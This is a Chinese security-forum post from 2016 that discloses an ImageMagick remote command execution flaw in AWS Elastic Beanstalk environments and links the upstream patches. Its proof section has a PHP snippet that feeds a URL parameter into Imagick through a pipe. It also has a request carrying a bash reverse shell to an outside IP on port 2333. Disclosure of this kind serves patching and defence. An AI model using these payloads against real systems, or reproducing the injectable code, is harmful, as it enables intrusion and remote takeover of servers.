HanDs
管理员

[7月漏洞公开] 亚马逊云环境存在远程命令执行 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

亚马逊云环境远程命令执行

详细说明:

Elastic Beanstalk环境是自动搭建web环境的aws产品,存在imagickmagick最新远程命令执行漏洞,上一次的补丁打了:

屏幕快照 2016-06-03 下午9.57.00.png

漏洞证明:

code 区域
<?php
$cmd=$_GET['cmd'];
echo $cmd;
new Imagick('|'."$cmd".'');
?>



code 区域
http://52.39.235.119/im.php?cmd=bash -i >%26 /dev/tcp/104.224.156.133/2333 0>%261



test.png

修复方案:

客户环境升级补丁。

http://git.imagemagick.org/repos/ImageMagick/commit/4674b3e1ea87a69646a6dbac8772c45eeb20c9f0

http://git.imagemagick.org/repos/ImageMagick/commit/40639d173aa8c76b850d625c630b711fee4dcfb


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
亚马逊 环境 存在 远程 命令 执行
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复